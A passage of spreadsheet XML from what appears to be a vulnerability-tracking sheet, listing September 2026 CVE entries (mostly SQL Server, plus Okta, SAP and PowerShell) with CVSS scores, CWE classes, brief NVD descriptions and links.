          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G363" s="5" t="inlineStr"/>
      <c r="H363" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I363" s="5" t="inlineStr"/>
      <c r="J363" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K363" s="5" t="inlineStr"/>
      <c r="L363" s="5" t="inlineStr"/>
      <c r="M363" s="5" t="inlineStr"/>
      <c r="N363" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O363" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P363" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q363" s="5" t="inlineStr"/>
      <c r="R363" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="S363" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway management console passes user-supplied input to eval() without sanitization during an authenticated administrator SSH session. As a result, the unsanitized input is executed directly, leading to code execution with the privileges of the management console.</t>
        </is>
      </c>
      <c r="T363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78550</t>
        </is>
      </c>
    </row>
    <row r="364">
      <c r="A364" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B364" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44766</t>
        </is>
      </c>
      <c r="D364" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E364" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F364" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G364" s="5" t="inlineStr"/>
      <c r="H364" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I364" s="5" t="inlineStr"/>
      <c r="J364" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K364" s="5" t="inlineStr"/>
      <c r="L364" s="5" t="inlineStr"/>
      <c r="M364" s="5" t="inlineStr"/>
      <c r="N364" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O364" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P364" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q364" s="5" t="inlineStr"/>
      <c r="R364" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S364" s="5" t="inlineStr">
        <is>
          <t>SAP S/4HANA (Intercompany Matching and Reconciliation) allows a low-privileged authenticated user to inject malicious input into certain functions, which may be processed by the database without proper validation. This could allow the user to access sensitive information, resulting in high impact on confidentiality, with no impact on integrity and availability of the application.</t>
        </is>
      </c>
      <c r="T364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44766</t>
        </is>
      </c>
    </row>
    <row r="365">
      <c r="A365" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B365" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62801</t>
        </is>
      </c>
      <c r="D365" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E365" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F365" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G365" s="5" t="inlineStr"/>
      <c r="H365" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I365" s="5" t="inlineStr"/>
      <c r="J365" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K36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65" s="5" t="inlineStr"/>
      <c r="M365" s="5" t="inlineStr"/>
      <c r="N365" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O365" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P365" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q365" s="5" t="inlineStr"/>
      <c r="R365" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S365" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows PowerShell allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="T365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62801</t>
        </is>
      </c>
    </row>
    <row r="366">
      <c r="A366" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B366" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66816</t>
        </is>
      </c>
      <c r="D366" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E366" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F366" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G366" s="5" t="inlineStr"/>
      <c r="H366" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I366" s="5" t="inlineStr"/>
      <c r="J366" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K366" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L366" s="5" t="inlineStr"/>
      <c r="M366" s="5" t="inlineStr"/>
      <c r="N366" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O366" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P366" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q366" s="5" t="inlineStr"/>
      <c r="R366" s="5" t="inlineStr">
        <is>
          <t>CWE-778</t>
        </is>
      </c>
      <c r="S366" s="5" t="inlineStr">
        <is>
          <t>Insufficient logging in SQL Server allows an authorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="T366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66816</t>
        </is>
      </c>
    </row>
    <row r="367">
      <c r="A367" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B367" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67369</t>
        </is>
      </c>
      <c r="D367" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E367" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F367" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G367" s="5" t="inlineStr"/>
      <c r="H367" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I367" s="5" t="inlineStr"/>
      <c r="J367" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K367" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L367" s="5" t="inlineStr"/>
      <c r="M367" s="5" t="inlineStr"/>
      <c r="N367" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O367" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P367" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q367" s="5" t="inlineStr"/>
      <c r="R367" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S367" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67369</t>
        </is>
      </c>
    </row>
    <row r="368">
      <c r="A368" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B368" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67383</t>
        </is>
      </c>
      <c r="D368" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E368" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F368" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G368" s="5" t="inlineStr"/>
      <c r="H368" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I368" s="5" t="inlineStr"/>
      <c r="J368" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K368" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L368" s="5" t="inlineStr"/>
      <c r="M368" s="5" t="inlineStr"/>
      <c r="N368" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O368" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P368" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q368" s="5" t="inlineStr"/>
      <c r="R368" s="5" t="inlineStr">
        <is>
          <t>CWE-209</t>
        </is>
      </c>
      <c r="S368" s="5" t="inlineStr">
        <is>
          <t>Generation of error message containing sensitive information in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67383</t>
        </is>
      </c>
    </row>
    <row r="369">
      <c r="A369" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B369" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67386</t>
        </is>
      </c>
      <c r="D369" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E369" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F369" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G369" s="5" t="inlineStr"/>
      <c r="H369" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I369" s="5" t="inlineStr"/>
      <c r="J369" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K369" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L369" s="5" t="inlineStr"/>
      <c r="M369" s="5" t="inlineStr"/>
      <c r="N369" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O369" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P369" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q369" s="5" t="inlineStr"/>
      <c r="R369" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="S369" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67386</t>
        </is>
      </c>
    </row>
    <row r="370">
      <c r="A370" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B370" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67389</t>
        </is>
      </c>
      <c r="D370" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E370" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F370" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G370" s="5" t="inlineStr"/>
      <c r="H370" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I370" s="5" t="inlineStr"/>
      <c r="J370" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K370" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L370" s="5" t="inlineStr"/>
      <c r="M370" s="5" t="inlineStr"/>
      <c r="N370" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O370" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P370" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q370" s="5" t="inlineStr"/>
      <c r="R370" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S370" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67389</t>
        </is>
      </c>
    </row>
    <row r="371">
      <c r="A371" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B371" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67390</t>
        </is>
      </c>
      <c r="D371" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E371" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F371" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G371" s="5" t="inlineStr"/>
      <c r="H371" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I371" s="5" t="inlineStr"/>
      <c r="J371" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K371" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L371" s="5" t="inlineStr"/>
      <c r="M371" s="5" t="inlineStr"/>
      <c r="N371" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O371" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P371" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q371" s="5" t="inlineStr"/>
      <c r="R371" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S371" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67390</t>
        </is>
      </c>
    </row>
    <row r="372">
      <c r="A372" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B372" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67393</t>
        </is>
      </c>
      <c r="D372" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E372" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F372" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G372" s="5" t="inlineStr"/>
      <c r="H372" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I372" s="5" t="inlineStr"/>
      <c r="J372" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K372" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L372" s="5" t="inlineStr"/>
      <c r="M372" s="5" t="inlineStr"/>
      <c r="N372" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O372" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P372" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q372" s="5" t="inlineStr"/>
      <c r="R372" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S372" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67393</t>
        </is>
      </c>
    </row>
    <row r="373">
      <c r="A373" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B373" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67633</t>
        </is>
      </c>
      <c r="D373" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E373" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F373" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G373" s="5" t="inlineStr"/>
      <c r="H373" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I373" s="5" t="inlineStr"/>
      <c r="J373" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K373" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L373" s="5" t="inlineStr"/>
      <c r="M373" s="5" t="inlineStr"/>
      <c r="N373" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O373" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P373" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q373" s="5" t="inlineStr"/>
      <c r="R373" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S373" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67633</t>
        </is>
      </c>
    </row>
    <row r="374">
      <c r="A374" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B374" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67641</t>
        </is>
      </c>
      <c r="D374" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E374" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F374" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G374" s="5" t="inlineStr"/>
      <c r="H374" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I374" s="5" t="inlineStr"/>
      <c r="J374" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K374" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L374" s="5" t="inlineStr"/>
      <c r="M374" s="5" t="inlineStr"/>
      <c r="N374" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O374" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P374" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q374" s="5" t="inlineStr"/>
      <c r="R374" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S374" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in SQL Server allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67641</t>
        </is>
      </c>
    </row>
    <row r="375">
      <c r="A375" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B375" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67645</t>
        </is>
      </c>
      <c r="D375" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E375" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F375" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G375" s="5" t="inlineStr"/>
      <c r="H375" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I375" s="5" t="inlineStr"/>
      <c r="J375" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K375" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L375" s="5" t="inlineStr"/>
      <c r="M375" s="5" t="inlineStr"/>
      <c r="N375" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O375" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P375" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q375" s="5" t="inlineStr"/>
      <c r="R375" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S375" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67645</t>
        </is>
      </c>
    </row>
    <row r="376">
      <c r="A376" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B376" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C376" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67648</t>
        </is>
      </c>
      <c r="D376" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E376" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F376" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G376" s="5" t="inlineStr"/>
      <c r="H376" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I376" s="5" t="inlineStr"/>
      <c r="J376" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K376" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L376" s="5" t="inlineStr"/>
      <c r="M376" s="5" t="inlineStr"/>
      <c r="N376" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O376" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P376" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q376" s="5" t="inlineStr"/>
      <c r="R376" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="S376" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67648</t>
        </is>
      </c>
    </row>
    <row r="377">
      <c r="A377" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B377" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C377" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68776</t>
        </is>
      </c>
      <c r="D377" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E377" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F377" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G377" s="5" t="inlineStr"/>
      <c r="H377" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I377" s="5" t="inlineStr"/>
      <c r="J377" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K377" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L377" s="5" t="inlineStr"/>
      <c r="M377" s="5" t="inlineStr"/>
      <c r="N377" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O377" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P377" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q377" s="5" t="inlineStr"/>
      <c r="R377" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="S377" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68776</t>
        </is>
      </c>
    </row>
    <row r="378">
      <c r="A378" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B378" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68777</t>
        </is>
      </c>
      <c r="D378" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E378" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F378" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G378" s="5" t="inlineStr"/>
      <c r="H378" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I378" s="5" t="inlineStr"/>
      <c r="J378" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K378" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L378" s="5" t="inlineStr"/>
      <c r="M378" s="5" t="inlineStr"/>
      <c r="N378" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O378" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P378" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q378" s="5" t="inlineStr"/>
      <c r="R378" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S378" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68777</t>
        </is>
      </c>
    </row>
    <row r="379">
      <c r="A379" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B379" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68778</t>
        </is>
      </c>
      <c r="D379" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E379" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F379" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G379" s="5" t="inlineStr"/>
      <c r="H379" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I379" s="5" t="inlineStr"/>
      <c r="J379" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
